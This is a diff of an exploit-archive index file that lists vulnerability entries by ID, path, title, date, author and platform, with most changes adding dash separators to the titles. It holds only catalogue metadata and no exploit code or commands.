24424,platforms/php/webapps/24424.txt,"Newtelligence DasBlog 1.x - Request Log HTML Injection",2004-09-01,"Dominick Baier",php,webapps,0 24425,platforms/php/webapps/24425.txt,"phpWebsite 0.7.3/0.8.x/0.9.x - Comment Module CM_pid XSS",2004-09-01,"GulfTech Security",php,webapps,0 -24426,platforms/windows/dos/24426.html,"Opera Web Browser 7.23 Empty Embedded Object JavaScript Denial of Service",2004-09-01,Stevo,windows,dos,0 +24426,platforms/windows/dos/24426.html,"Opera Web Browser 7.23 - Empty Embedded Object JavaScript Denial of Service",2004-09-01,Stevo,windows,dos,0 24432,platforms/windows/webapps/24432.txt,"Microsoft Internet Explorer 8 / 9 - Steal Any Cookie",2013-01-28,"Christian Haider",windows,webapps,0 24441,platforms/hardware/webapps/24441.txt,"Netgear SPH200D - Multiple Vulnerabilities",2013-01-31,m-1-k-3,hardware,webapps,0 24508,platforms/php/webapps/24508.txt,"Scripts Genie Gallery Personals - (gallery.php L param) SQL Injection",2013-02-17,3spi0n,php,webapps,0 24433,platforms/php/webapps/24433.txt,"php weby directory software 1.2 - Multiple Vulnerabilities",2013-01-28,AkaStep,php,webapps,0 24460,platforms/windows/remote/24460.rb,"VMware OVF Tools - Format String (1)",2013-02-06,Metasploit,windows,remote,0 -24434,platforms/multiple/remote/24434.rb,"Ruby on Rails JSON Processor YAML Deserialization Code Execution",2013-01-29,Metasploit,multiple,remote,0 +24434,platforms/multiple/remote/24434.rb,"Ruby on Rails - JSON Processor YAML Deserialization Code Execution",2013-01-29,Metasploit,multiple,remote,0 24435,platforms/hardware/webapps/24435.txt,"Fortinet FortiMail 400 IBE - Multiple Vulnerabilities",2013-01-29,Vulnerability-Lab,hardware,webapps,0 24436,platforms/php/webapps/24436.txt,"Kohana Framework 2.3.3 - Directory Traversal",2013-01-29,Vulnerability-Lab,php,webapps,0 24437,platforms/windows/dos/24437.py,"Apple Quick Time Player (Windows) 7.7.3 - Out of Bound Read",2013-01-29,"Debasish Mandal",windows,dos,0 @@ -21657,14 +21652,14 @@ id,file,description,date,author,platform,type,port 24476,platforms/hardware/webapps/24476.txt,"Linksys WAG200G - Multiple Vulnerabilities",2013-02-11,m-1-k-3,hardware,webapps,0 24477,platforms/hardware/webapps/24477.txt,"D-Link DIR-615 rev H - Multiple Vulnerabilities",2013-02-11,m-1-k-3,hardware,webapps,0 24478,platforms/hardware/webapps/24478.txt,"Linksys WRT160N - Multiple Vulnerabilities",2013-02-11,m-1-k-3,hardware,webapps,0 -24479,platforms/windows/remote/24479.py,"FreeFloat FTP 1.0 Raw Commands Buffer Overflow",2013-02-11,superkojiman,windows,remote,0 -24480,platforms/php/webapps/24480.txt,"IRIS Citations Management Tool - (post auth) Remote Command Execution",2013-02-11,aeon,php,webapps,0 +24479,platforms/windows/remote/24479.py,"FreeFloat FTP 1.0 - Raw Commands Buffer Overflow",2013-02-11,superkojiman,windows,remote,0 +24480,platforms/php/webapps/24480.txt,"IRIS Citations Management Tool - (Post-Auth) Remote Command Execution",2013-02-11,aeon,php,webapps,0 24481,platforms/php/webapps/24481.txt,"IP.Gallery 4.2.x / 5.0.x - Persistent XSS",2013-02-11,"Mohamed Ramadan",php,webapps,0 -24483,platforms/hardware/webapps/24483.txt,"TP-LINK Admin Panel Multiple CSRF Vulnerabilities",2013-02-11,"CYBSEC Labs",hardware,webapps,0 +24483,platforms/hardware/webapps/24483.txt,"TP-LINK Admin Panel - Multiple CSRF Vulnerabilities",2013-02-11,"CYBSEC Labs",hardware,webapps,0 24484,platforms/hardware/webapps/24484.txt,"Air Disk Wireless 1.9 iPad iPhone - Multiple Vulnerabilities",2013-02-11,Vulnerability-Lab,hardware,webapps,0 24485,platforms/windows/dos/24485.txt,"Windows - HWND_BROADCAST PoC (MS13-005)",2013-02-11,0vercl0k,windows,dos,0 -24486,platforms/multiple/dos/24486.txt,"Google Chrome Silent HTTP Authentication",2013-02-11,T355,multiple,dos,0 -24487,platforms/linux/dos/24487.py,"cURL Buffer Overflow",2013-02-11,Volema,linux,dos,0 +24486,platforms/multiple/dos/24486.txt,"Google Chrome - Silent HTTP Authentication",2013-02-11,T355,multiple,dos,0 +24487,platforms/linux/dos/24487.py,"cURL - Buffer Overflow",2013-02-11,Volema,linux,dos,0 24520,platforms/php/webapps/24520.txt,"Piwigo 2.4.6 - (install.php) Remote Arbitrary File Read/Delete",2013-02-19,LiquidWorm,php,webapps,0 24509,platforms/php/webapps/24509.txt,"Scripts Genie Games Site Script - (index.php id param) SQL Injection",2013-02-17,3spi0n,php,webapps,0 24490,platforms/windows/remote/24490.rb,"Novell GroupWise Client - gwcls1.dll ActiveX Remote Code Execution",2013-02-12,Metasploit,windows,remote,0 @@ -21676,8 +21671,8 @@ id,file,description,date,author,platform,type,port 24498,platforms/hardware/webapps/24498.txt,"OpenPLI 3.0 beta (OpenPLi-beta-dm7000-20130127-272) - Multiple Vulnerabilities",2013-02-14,m-1-k-3,hardware,webapps,0 24499,platforms/hardware/webapps/24499.txt,"Raidsonic IB-NAS5220 and IB-NAS4220-B - Multiple Vulnerabilities",2013-02-14,m-1-k-3,hardware,webapps,0 24500,platforms/windows/webapps/24500.txt,"Sonicwall OEM Scrutinizer 9.5.2 - Multiple Vulnerabilities",2013-02-14,Vulnerability-Lab,windows,webapps,0 -24501,platforms/php/webapps/24501.txt,"Ultra Light Forum Persistant XSS",2013-02-14,"cr4wl3r ",php,webapps,0 -24502,platforms/windows/remote/24502.rb,"Foxit Reader Plugin URL Processing Buffer Overflow",2013-02-14,Metasploit,windows,remote,0 +24501,platforms/php/webapps/24501.txt,"Ultra Light Forum - Persistant XSS",2013-02-14,"cr4wl3r ",php,webapps,0 +24502,platforms/windows/remote/24502.rb,"Foxit Reader Plugin - URL Processing Buffer Overflow",2013-02-14,Metasploit,windows,remote,0 24504,platforms/hardware/webapps/24504.txt,"TP-Link TL-WA701N / TL-WA701ND - Multiple Vulnerabilities",2013-02-15,m-1-k-3,hardware,webapps,0 24505,platforms/windows/local/24505.py,"Photodex ProShow Producer 5.0.3297 - (.pxs) Memory Corruption Exploit",2013-02-15,"Julien Ahrens",windows,local,0 24506,platforms/php/webapps/24506.txt,"Cometchat - Multiple Vulnerabilities",2013-02-15,B127Y,php,webapps,0 @@ -21716,20 +21711,20 @@ id,file,description,date,author,platform,type,port 24552,platforms/php/webapps/24552.txt,"WordPress Comment Rating Plugin 2.9.32 - Multiple Vulnerabilities",2013-02-27,ebanyu,php,webapps,0 24555,platforms/linux/local/24555.c,"Linux Kernel < 3.3.x < 3.7.x (Arch Linux x86_64) - 'sock_diag_handlers[]' Local Root (1)",2013-02-27,sd,linux,local,0 24556,platforms/windows/dos/24556.py,"Hanso Player 2.1.0 - (.m3u) Buffer Overflow",2013-03-01,metacom,windows,dos,0 -24557,platforms/windows/remote/24557.py,"Sami FTP Server 2.0.1 LIST Command Buffer Overflow",2013-03-01,superkojiman,windows,remote,0 +24557,platforms/windows/remote/24557.py,"Sami FTP Server 2.0.1 - LIST Command Buffer Overflow",2013-03-01,superkojiman,windows,remote,0 24560,platforms/php/webapps/24560.txt,"doorGets CMS - CSRF",2013-03-01,n0pe,php,webapps,0 24561,platforms/php/webapps/24561.txt,"Piwigo 2.4.6 - Multiple Vulnerabilities",2013-03-01,"High-Tech Bridge SA",php,webapps,0 24562,platforms/php/webapps/24562.txt,"PHP-Fusion 7.02.05 - Multiple Vulnerabilities",2013-03-01,waraxe,php,webapps,0 24563,platforms/hardware/webapps/24563.txt,"D-Link DSL-2740B - (ADSL Router) Authentication Bypass",2013-03-04,"Ivano Binetti",hardware,webapps,0 24564,platforms/php/webapps/24564.txt,"Nconf 1.3 - Multiple SQL Injections",2013-03-04,"Saadi Siddiqui",php,webapps,0 -24565,platforms/php/webapps/24565.txt,"SiteCubed MailWorks Professional Authentication Bypass",2004-09-02,"Paul Craig",php,webapps,0 +24565,platforms/php/webapps/24565.txt,"SiteCubed MailWorks Professional - Authentication Bypass",2004-09-02,"Paul Craig",php,webapps,0 24566,platforms/php/webapps/24566.txt,"CuteNews 0.88/1.3.x - 'index.php' Cross-Site Scripting",2004-09-02,Exoduks,php,webapps,0 24567,platforms/multiple/remote/24567.txt,"Oracle Database Server 8.1.7/9.0.x - ctxsys.driload Access Validation",2004-09-03,"Alexander Kornbrust",multiple,remote,0 24568,platforms/windows/remote/24568.html,"Grokster 1.3/2.6 / KaZaA Media Desktop 1.3.x/1.6.1/2.0.x - ActiveX Control Remote Buffer Overflow",2004-09-03,celebrityhacker,windows,remote,0 24569,platforms/linux/dos/24569.txt,"QNX PPPoEd 2.4/4.25/6.2 - Multiple Local Buffer Overrun Vulnerabilities",2004-09-03,"Julio Cesar Fort",linux,dos,0 24570,platforms/linux/local/24570.txt,"QNX PPPoEd 2.4/4.25/6.2 - Path Environment Variable Local Command Execution",2004-09-03,"Julio Cesar Fort",linux,local,0 24571,platforms/windows/remote/24571.html,"Nullsoft Winamp 2.x/3.x/5.0.x - ActiveX Control Remote Buffer Overflow",2004-09-03,celebrityhacker,windows,remote,0 -24572,platforms/windows/remote/24572.pl,"Ipswitch WhatsUp Gold 7.0/8.0 Notification Instance Name Remote Buffer Overflow",2004-09-03,anonymous,windows,remote,0 +24572,platforms/windows/remote/24572.pl,"Ipswitch WhatsUp Gold 7.0/8.0 - Notification Instance Name Remote Buffer Overflow",2004-09-03,anonymous,windows,remote,0 24573,platforms/multiple/webapps/24573.txt,"Keene Digital Media Server 1.0.2 - Cross-Site Scripting",2004-09-04,dr_insane,multiple,webapps,0 24574,platforms/cgi/webapps/24574.txt,"Webmin 1.x - HTML Email Command Execution",2004-09-07,"Keigo Yamazaki",cgi,webapps,0 24575,platforms/php/webapps/24575.txt,"PSNews 1.1 - No Parameter Cross-Site Scripting",2004-09-05,"Michal Blaszczak",php,webapps,0 @@ -21742,9 +21737,9 @@ id,file,description,date,author,platform,type,port 24578,platforms/osx/local/24578.rb,"Tunnelblick - Setuid Privilege Escalation",2013-03-05,Metasploit,osx,local,0 24579,platforms/osx/local/24579.rb,"Viscosity - setuid-set ViscosityHelper Privilege Escalation",2013-03-05,Metasploit,osx,local,0 24580,platforms/windows/dos/24580.txt,"Kaspersky Internet Security 2013 - Denial of Service",2013-03-05,"Marc Heuse",windows,dos,0 -24581,platforms/multiple/remote/24581.txt,"SAFE TEAM Regulus 2.2 Staffile Information Disclosure",2004-09-07,masud_libra,multiple,remote,0 +24581,platforms/multiple/remote/24581.txt,"SAFE TEAM Regulus 2.2 - Staffile Information Disclosure",2004-09-07,masud_libra,multiple,remote,0 24582,platforms/php/webapps/24582.txt,"SAFE TEAM Regulus 2.2 - Custchoice.php Update Your Password Action Information Disclosure",2004-09-07,masud_libra,php,webapps,0 -24583,platforms/php/webapps/24583.txt,"SAFE TEAM Regulus 2.2 Customer Statistics Information Disclosure",2004-09-07,masud_libra,php,webapps,0 +24583,platforms/php/webapps/24583.txt,"SAFE TEAM Regulus 2.2 - Customer Statistics Information Disclosure",2004-09-07,masud_libra,php,webapps,0 24584,platforms/windows/remote/24584.c,"Cerulean Studios Trillian Client 0.74 MSN Module - Remote Buffer Overflow",2004-09-08,Komrade,windows,remote,0 24585,platforms/php/webapps/24585.txt,"BBS E-Market Professional bf_130 (1.3.0) - Remote File Inclusion",2004-09-09,"Ahmad Muammar",php,webapps,0 24586,platforms/windows/dos/24586.txt,"Gearbox Software Halo Combat Evolved 1.x - Game Server Remote Denial of Service",2004-09-09,"Luigi Auriemma",windows,dos,0 @@ -21835,7 +21830,7 @@ id,file,description,date,author,platform,type,port 24676,platforms/php/webapps/24676.txt,"SCT Campus Pipeline 1.0/2.x/3.x - Render.UserLayoutRootNode.uP Cross-Site Scripting",2004-10-13,"Matthew Oyer",php,webapps,0 24677,platforms/linux/dos/24677.txt,"IBM DB2 DTS To String Conversion - Denial of Service",2004-09-01,"Chris Anley",linux,dos,0 24678,platforms/windows/local/24678.txt,"IBM DB2 - Universal Database Information Disclosure",2004-09-01,"Chris Anley",windows,local,0 -24679,platforms/windows/dos/24679.txt,"IBM DB2 Semaphore Signaling Denial of Service",2004-09-01,"Chris Anley",windows,dos,0 +24679,platforms/windows/dos/24679.txt,"IBM DB2 Semaphore Signaling - Denial of Service",2004-09-01,"Chris Anley",windows,dos,0 24680,platforms/cfm/webapps/24680.txt,"FuseTalk Forum 4.0 - Multiple Cross-Site Scripting Vulnerabilities",2004-10-13,steven,cfm,webapps,0 24681,platforms/hardware/remote/24681.txt,"3Com 3CRADSL72 ADSL Wireless Router - Information Disclosure / Authentication Bypass",2004-10-13,Karb0nOxyde,hardware,remote,0 24682,platforms/windows/local/24682.c,"Microsoft Windows XP - Weak Default Configuration",2004-10-13,americanidiot,windows,local,0 @@ -21869,9 +21864,9 @@ id,file,description,date,author,platform,type,port 24889,platforms/php/webapps/24889.txt,"WordPress Mathjax Latex Plugin 1.1 - CSRF",2013-03-26,"Junaid Hussain",php,webapps,0 24890,platforms/windows/remote/24890.rb,"ActFax 5.01 - RAW Server Buffer Overflow",2013-03-26,Metasploit,windows,remote,0 24710,platforms/multiple/dos/24710.txt,"id software quake ii server 3.2 - Multiple Vulnerabilities",2004-10-27,"Richard Stanway",multiple,dos,0 -24711,platforms/php/remote/24711.php,"PHP 4.x/5 cURL Open_Basedir Restriction Bypass",2004-10-28,FraMe,php,remote,0 +24711,platforms/php/remote/24711.php,"PHP 4.x/5 - cURL Open_Basedir Restriction Bypass",2004-10-28,FraMe,php,remote,0 24712,platforms/windows/remote/24712.txt,"Microsoft Internet Explorer 6.0 - TABLE Status Bar URI Obfuscation Weakness",2004-10-28,"Benjamin Tobias Franz",windows,remote,0 -24713,platforms/multiple/remote/24713.txt,"Global Spy Software Cyber Web Filter 2 IP Filter Bypass",2004-10-29,anonymous,multiple,remote,0 +24713,platforms/multiple/remote/24713.txt,"Global Spy Software Cyber Web Filter 2 - IP Filter Bypass",2004-10-29,anonymous,multiple,remote,0 24714,platforms/windows/remote/24714.txt,"Microsoft Internet Explorer 6.0 - HTML Form Tags URI Obfuscation Weakness",2004-10-30,http-equiv,windows,remote,0 24715,platforms/multiple/dos/24715.txt,"Caudium 1.x - Remote Denial of Service",2004-10-30,"David Gourdelier",multiple,dos,0 24716,platforms/osx/remote/24716.txt,"Apple Safari 1.2 Web Browser - TABLE Status Bar URI Obfuscation Weakness",2004-11-01,"Gilbert Verdian",osx,remote,0 @@ -21881,7 +21876,7 @@ id,file,description,date,author,platform,type,port 24921,platforms/php/webapps/24921.txt,"OpenCart - Change User Password CSRF",2013-04-08,"Saadi Siddiqui",php,webapps,0 24722,platforms/cgi/webapps/24722.txt,"TIPS MailPost 5.1.1 - Error Message Cross-Site Scripting",2004-11-03,Procheckup,cgi,webapps,0 24723,platforms/cgi/webapps/24723.txt,"TIPS MailPost 5.1.1 - Remote File Enumeration",2004-11-03,"Gemma Hughes",cgi,webapps,0 -24724,platforms/multiple/remote/24724.c,"Monolith Lithtech Game Engine Multiple Remote Format String Vulnerabilities",2004-11-05,"Luigi Auriemma",multiple,remote,0 +24724,platforms/multiple/remote/24724.c,"Monolith Lithtech Game Engine - Multiple Remote Format String Vulnerabilities",2004-11-05,"Luigi Auriemma",multiple,remote,0 24725,platforms/multiple/remote/24725.php,"Trend Micro ScanMail for Domino 2.51/2.6 - Remote File Disclosure",2004-11-05,DokFLeed,multiple,remote,0 24726,platforms/windows/dos/24726.txt,"Software602 602 LAN Suite - Multiple Remote Denial of Service Vulnerabilities",2004-11-06,"Luigi Auriemma",windows,dos,0 24727,platforms/windows/remote/24727.txt,"Microsoft Internet Explorer 6.0 - Local Resource Enumeration",2004-11-08,"Benjamin Tobias Franz",windows,remote,0 @@ -21894,7 +21889,7 @@ id,file,description,date,author,platform,type,port 24734,platforms/php/webapps/24734.txt,"chacmool Private Message System 1.1.3 - send.php tid Parameter XSS",2004-11-12,"digital ex",php,webapps,0 24735,platforms/php/webapps/24735.txt,"chacmool Private Message System 1.1.3 - send.php Arbitrary Message Access",2004-11-12,"digital ex",php,webapps,0 24736,platforms/php/webapps/24736.txt,"PHPWebSite 0.7.3/0.8.x/0.9.3 - User Module HTTP Response Splitting",2004-11-04,"Maestro De-Seguridad",php,webapps,0 -24737,platforms/php/webapps/24737.txt,"Mark Zuckerberg Thefacebook Multiple Cross-Site Scripting Vulnerabilities",2004-11-13,"Alex Lanstein",php,webapps,0 +24737,platforms/php/webapps/24737.txt,"Mark Zuckerberg Thefacebook - Multiple Cross-Site Scripting Vulnerabilities",2004-11-13,"Alex Lanstein",php,webapps,0 24738,platforms/windows/dos/24738.c,"AlShare Software NetNote Server 2.2 - Remote Denial of Service",2004-11-13,class101,windows,dos,0 24739,platforms/php/webapps/24739.txt,"PowerPortal 1.3 - SQL Injection",2004-11-14,ruggine,php,webapps,0 24740,platforms/hardware/webapps/24740.txt,"AirDrive HD 1.6 iPad iPhone - Multiple Vulnerabilities",2013-02-24,Vulnerability-Lab,hardware,webapps,0 @@ -21917,7 +21912,7 @@ id,file,description,date,author,platform,type,port 24757,platforms/linux/local/24757.java,"opera Web browser 7.54 java implementation - Multiple Vulnerabilities (3)",2004-11-19,"Marc Schoenefeld",linux,local,0 24758,platforms/linux/local/24758.java,"opera Web browser 7.54 java implementation - Multiple Vulnerabilities (4)",2004-11-19,"Marc Schoenefeld",linux,local,0 24759,platforms/php/webapps/24759.txt,"IPBProArcade 2.5 - SQL Injection",2004-11-20,"axl daivy",php,webapps,0 -24760,platforms/hardware/remote/24760.txt,"ZyXEL 3 Prestige Router HTTP Remote Administration Configuration Reset",2004-11-22,"Francisco Canela",hardware,remote,0 +24760,platforms/hardware/remote/24760.txt,"ZyXEL 3 Prestige Router - HTTP Remote Administration Configuration Reset",2004-11-22,"Francisco Canela",hardware,remote,0 24761,platforms/multiple/dos/24761.txt,"Gearbox Software Halo Game 1.x - Client Remote Denial of Service",2004-11-22,"Luigi Auriemma",multiple,dos,0 24762,platforms/php/webapps/24762.txt,"PHPKIT 1.6 - Multiple Input Validation Vulnerabilities",2004-11-22,Steve,php,webapps,0 24763,platforms/multiple/dos/24763.txt,"Sun Java Runtime Environment 1.x Java Plugin - JavaScript Security Restriction Bypass",2004-11-22,"Jouko Pynnonen",multiple,dos,0 @@ -21932,12 +21927,12 @@ id,file,description,date,author,platform,type,port 24773,platforms/jsp/webapps/24773.txt,"JSPWiki 2.1 - Cross-Site Scripting",2004-11-24,"Jeremy Bae",jsp,webapps,0 24774,platforms/multiple/remote/24774.java,"Open DC Hub 0.7.14 - Remote Buffer Overflow",2004-11-24,"Donato Ferrante",multiple,remote,0 24775,platforms/windows/dos/24775.html,"Microsoft Internet Explorer 6.0 - Infinite Array Sort Denial of Service",2004-11-25,"Berend-Jan Wever",windows,dos,0 -24776,platforms/windows/dos/24776.html,"Mozilla Firefox 0.8/0.9/0.10 Infinite Array Sort Denial of Service",2004-11-25,"Berend-Jan Wever",windows,dos,0 +24776,platforms/windows/dos/24776.html,"Mozilla Firefox 0.8/0.9/0.10 - Infinite Array Sort Denial of Service",2004-11-25,"Berend-Jan Wever",windows,dos,0 24777,platforms/linux/dos/24777.txt,"Linux Kernel 2.4.x / 2.6.x - Local Denial of Service And Memory Disclosure Vulnerabilities",2004-11-25,"Florian Heinz",linux,dos,0 24778,platforms/multiple/dos/24778.html,"Sun Java Applet 1.x - Invocation Version Specification Weakness",2004-11-25,"Peter Greenwood",multiple,dos,0 24779,platforms/cgi/webapps/24779.txt,"InShop and InMail - Cross-Site Scripting",2004-11-25,"Carlos Ulver",cgi,webapps,0 24780,platforms/osx/dos/24780.html,"Apple Safari Web Browser 1.x - Infinite Array Sort Denial of Service",2004-11-25,"Berend-Jan Wever",osx,dos,0 -24781,platforms/multiple/dos/24781.html,"Mozilla Camino Web Browser 0.7/0.8 Infinite Array Sort Denial of Service",2004-11-25,"Berend-Jan Wever",multiple,dos,0 +24781,platforms/multiple/dos/24781.html,"Mozilla Camino Web Browser 0.7/0.8 - Infinite Array Sort Denial of Service",2004-11-25,"Berend-Jan Wever",multiple,dos,0 24782,platforms/php/webapps/24782.txt,"PHPCMS 1.1/1.2 - Cross-Site Scripting",2004-11-26,"Cyrille Barthelemy",php,webapps,0 24783,platforms/php/webapps/24783.txt,"pntresmailer 6.0 - Directory Traversal",2004-11-26,"John Cobb",php,webapps,0 24784,platforms/linux/remote/24784.txt,"File ELF 4.x - Header Unspecified Buffer Overflow",2004-11-29,anonymous,linux,remote,0 @@ -21969,7 +21964,7 @@ id,file,description,date,author,platform,type,port 24810,platforms/php/webapps/24810.txt,"PhpGedView 2.x - Descendancy.php Cross-Site Scripting",2004-01-19,JeiAr,php,webapps,0 24811,platforms/windows/remote/24811.txt,"F-Secure Policy Manager 5.11 - FSMSH.DLL CGI Application Installation Path Disclosure",2004-12-09,oliver@greyhat.de,windows,remote,0 24814,platforms/php/webapps/24814.txt,"PhpGedView 2.5/2.6 - Index.php Cross-Site Scripting",2004-01-12,JeiAr,php,webapps,0 -24815,platforms/linux/dos/24815.txt,"Gamespy Software Development Kit CD-Key Validation Buffer Overflow",2004-12-10,"Luigi Auriemma",linux,dos,0 +24815,platforms/linux/dos/24815.txt,"Gamespy Software Development Kit - CD-Key Validation Buffer Overflow",2004-12-10,"Luigi Auriemma",linux,dos,0 24816,platforms/php/webapps/24816.txt,"PhpGedView 2.5/2.6 - Individual.php Cross-Site Scripting",2004-01-12,JeiAr,php,webapps,0 24817,platforms/php/webapps/24817.txt,"phpMyAdmin 2.x - External Transformations Remote Command Execution",2004-12-13,"Nicolas Gregoire",php,webapps,0 24818,platforms/multiple/dos/24818.txt,"Digital Illusions CE Codename Eagle - Remote Denial of Service",2004-12-13,"Luigi Auriemma",multiple,dos,0 @@ -21982,19 +21977,19 @@ id,file,description,date,author,platform,type,port 24825,platforms/php/webapps/24825.txt,"UBBCentral UBB.threads 6.2.3/6.5 - calendar.php Cat Parameter XSS",2004-12-13,"dw. and ms.",php,webapps,0 24826,platforms/php/webapps/24826.txt,"UBBCentral UBB.threads 6.2.3/6.5 - login.php Cat Parameter XSS",2004-12-13,"dw. and ms.",php,webapps,0 24827,platforms/php/webapps/24827.txt,"UBBCentral UBB.threads 6.2.3/6.5 - online.php Cat Parameter XSS",2004-12-13,"dw. and ms.",php,webapps,0 -24828,platforms/linux/dos/24828.txt,"Opera Web Browser 7.54 KDE KFMCLIENT Remote Command Execution",2004-12-13,"Giovanni Delvecchio",linux,dos,0 +24828,platforms/linux/dos/24828.txt,"Opera Web Browser 7.54 - KDE KFMCLIENT Remote Command Execution",2004-12-13,"Giovanni Delvecchio",linux,dos,0 24829,platforms/php/webapps/24829.txt,"PhpGedView 2.5/2.6 - Login.php URL Parameter Cross-Site Scripting",2004-01-12,JeiAr,php,webapps,0 24830,platforms/php/webapps/24830.txt,"PhpGedView 2.5/2.6 - Login.php Username Parameter Cross-Site Scripting",2004-01-12,JeiAr,php,webapps,0 24831,platforms/php/webapps/24831.txt,"PhpGedView 2.5/2.6 - Login.php Newlanguage Cross-Site Scripting",2004-01-12,JeiAr,php,webapps,0 24832,platforms/php/webapps/24832.txt,"PhpGedView 2.5/2.6 - Relationship.php Cross-Site Scripting",2004-01-12,JeiAr,php,webapps,0 -24852,platforms/linux/remote/24852.txt,"MPG123 0.59 Find Next File Remote Client-Side Buffer Overflow",2004-12-15,"Bartlomiej Sieka",linux,remote,0 -24853,platforms/linux/remote/24853.c,"MPlayer 0.9/1.0 MMST Get_Header Remote Client-Side Buffer Overflow",2004-12-15,"Ariel Berkman",linux,remote,0 +24852,platforms/linux/remote/24852.txt,"MPG123 0.59 - Find Next File Remote Client-Side Buffer Overflow",2004-12-15,"Bartlomiej Sieka",linux,remote,0 +24853,platforms/linux/remote/24853.c,"MPlayer 0.9/1.0 - MMST Get_Header Remote Client-Side Buffer Overflow",2004-12-15,"Ariel Berkman",linux,remote,0 24834,platforms/php/webapps/24834.txt,"PhpGedView 2.5/2.6 - Calendar.php Cross-Site Scripting",2004-01-12,JeiAr,php,webapps,0 24835,platforms/php/webapps/24835.txt,"PhpGedView 2.5/2.6 - Placelist.php SQL Injection",2004-01-12,JeiAr,php,webapps,0 24836,platforms/cgi/webapps/24836.txt,"UseModWiki 1.0 - Wiki.PL Cross-Site Scripting",2004-12-14,"Jeremy Bae",cgi,webapps,0 24837,platforms/php/webapps/24837.txt,"PhpGedView 2.5/2.6 - Timeline.php SQL Injection",2004-01-12,JeiAr,php,webapps,0 24838,platforms/asp/webapps/24838.txt,"Active Server Corner ASP Calendar 1.0 - Administrative Access",2004-12-14,"ali reza AcTiOnSpIdEr",asp,webapps,0 -24839,platforms/hardware/dos/24839.c,"Ricoh Aficio 450/455 PCL Printer Remote ICMP Denial of Service",2004-12-14,"Hongzhen Zhou",hardware,dos,0 +24839,platforms/hardware/dos/24839.c,"Ricoh Aficio 450/455 PCL Printer - Remote ICMP Denial of Service",2004-12-14,"Hongzhen Zhou",hardware,dos,0 24840,platforms/asp/webapps/24840.txt,"ASP-Rider - SQL Injection",2004-12-14,"Shervin Khaleghjou",asp,webapps,0 24841,platforms/windows/dos/24841.txt,"Adobe Acrobat/Acrobat Reader 6.0 - ETD File Parser Format String",2004-12-14,"Greg MacManus",windows,dos,0 24842,platforms/php/webapps/24842.txt,"IWebNegar - Multiple SQL Injection",2004-12-15,"Shervin Khaleghjou",php,webapps,0 @@ -22003,7 +21998,7 @@ id,file,description,date,author,platform,type,port 24845,platforms/php/webapps/24845.txt,"phpGroupWare 0.9.x - viewticket_details.php ticket_id Parameter XSS",2004-12-15,"James Bercegay",php,webapps,0 24846,platforms/php/webapps/24846.txt,"phpGroupWare 0.9.x - viewticket_details.php ticket_id Parameter SQL Injection",2004-12-15,"James Bercegay",php,webapps,0 24847,platforms/php/webapps/24847.txt,"phpGroupWare 0.9.x - index.php Multiple Parameter SQL Injection",2004-12-15,"James Bercegay",php,webapps,0 -24848,platforms/linux/remote/24848.txt,"ChBg 1.5 Scenario File Overflow",2004-12-15,"Danny Lungstrom",linux,remote,0 +24848,platforms/linux/remote/24848.txt,"ChBg 1.5 - Scenario File Overflow",2004-12-15,"Danny Lungstrom",linux,remote,0 24849,platforms/php/webapps/24849.txt,"DaloRadius - Multiple Vulnerabilities",2013-03-18,"Saadi Siddiqui",php,webapps,0 24850,platforms/php/webapps/24850.txt,"WordPress Simply Poll Plugin 1.4.1 - Multiple Vulnerabilities",2013-03-18,m3tamantra,php,webapps,0 24851,platforms/php/webapps/24851.txt,"Joomla RSfiles Component (cid param) - SQL Injection",2013-03-18,ByEge,php,webapps,0 @@ -22017,7 +22012,7 @@ id,file,description,date,author,platform,type,port 24862,platforms/php/webapps/24862.txt,"ViewGit 0.0.6 - Multiple XSS Vulnerabilities",2013-03-19,"Matthew R. Bucci",php,webapps,0 24863,platforms/windows/local/24863.html,"EastFTP 4.6.02 - ActiveX Control (0Day)",2013-03-20,Dr_IDE,windows,local,0 24864,platforms/hardware/webapps/24864.pl,"StarVedia IPCamera IC502w IC502w+ v020313 - Username/Password Disclosure",2013-03-22,"Todor Donev",hardware,webapps,0 -24865,platforms/linux/dos/24865.txt,"GnuTLS libgnutls Double-free Certificate List Parsing Remote DoS",2013-03-22,"Shawn the R0ck",linux,dos,0 +24865,platforms/linux/dos/24865.txt,"GnuTLS libgnutls - Double-free Certificate List Parsing Remote DoS",2013-03-22,"Shawn the R0ck",linux,dos,0 24866,platforms/hardware/dos/24866.txt,"TP-Link TL-WR740N Wireless Router - Denial of Service",2013-03-22,LiquidWorm,hardware,dos,0 24867,platforms/php/webapps/24867.html,"WordPress IndiaNIC FAQs Manager Plugin 1.0 - Multiple Vulnerabilities",2013-03-22,m3tamantra,php,webapps,0 24868,platforms/php/webapps/24868.rb,"WordPress IndiaNIC FAQs Manager Plugin 1.0 - Blind SQL Injection",2013-03-22,m3tamantra,php,webapps,0 @@ -22027,7 +22022,7 @@ id,file,description,date,author,platform,type,port 24872,platforms/windows/local/24872.txt,"Photodex ProShow Gold/Producer 5.0.3310 & 6.0.3410 - ScsiAccess Local Privilege Escalation",2013-03-22,"Julien Ahrens",windows,local,0 24873,platforms/php/webapps/24873.txt,"Stradus CMS 1.0beta4 - Multiple Vulnerabilities",2013-03-22,DaOne,php,webapps,0 24874,platforms/multiple/remote/24874.rb,"Apache Struts - ParametersInterceptor Remote Code Execution",2013-03-22,Metasploit,multiple,remote,0 -24875,platforms/windows/remote/24875.rb,"Sami FTP Server LIST Command Buffer Overflow",2013-03-22,Metasploit,windows,remote,0 +24875,platforms/windows/remote/24875.rb,"Sami FTP Server - LIST Command Buffer Overflow",2013-03-22,Metasploit,windows,remote,0 24876,platforms/windows/remote/24876.rb,"Cool PDF Image Stream - Buffer Overflow",2013-03-22,Metasploit,windows,remote,0 24877,platforms/php/webapps/24877.txt,"OpenCart 1.5.5.1 - (filemanager.php) Directory Traversal Arbitrary File Access",2013-03-22,waraxe,php,webapps,0 24879,platforms/php/webapps/24879.txt,"Free Hosting Manager 2.0.2 - Multiple SQLi",2013-03-25,"Saadi Siddiqui",php,webapps,0 @@ -22052,7 +22047,7 @@ id,file,description,date,author,platform,type,port 24955,platforms/linux/remote/24955.rb,"Nagios Remote Plugin Executor - Arbitrary Command Execution",2013-04-12,Metasploit,linux,remote,5666 24917,platforms/windows/dos/24917.py,"Easy DVD Player 3.5.1 - (libav) libavcodec_plugin.dll DoS",2013-04-05,metacom,windows,dos,0 24901,platforms/windows/webapps/24901.txt,"MailOrderWorks 5.907 - Multiple Vulnerabilities",2013-03-29,Vulnerability-Lab,windows,webapps,0 -24902,platforms/php/remote/24902.rb,"STUNSHELL Web Shell Remote PHP Code Execution",2013-03-29,Metasploit,php,remote,0 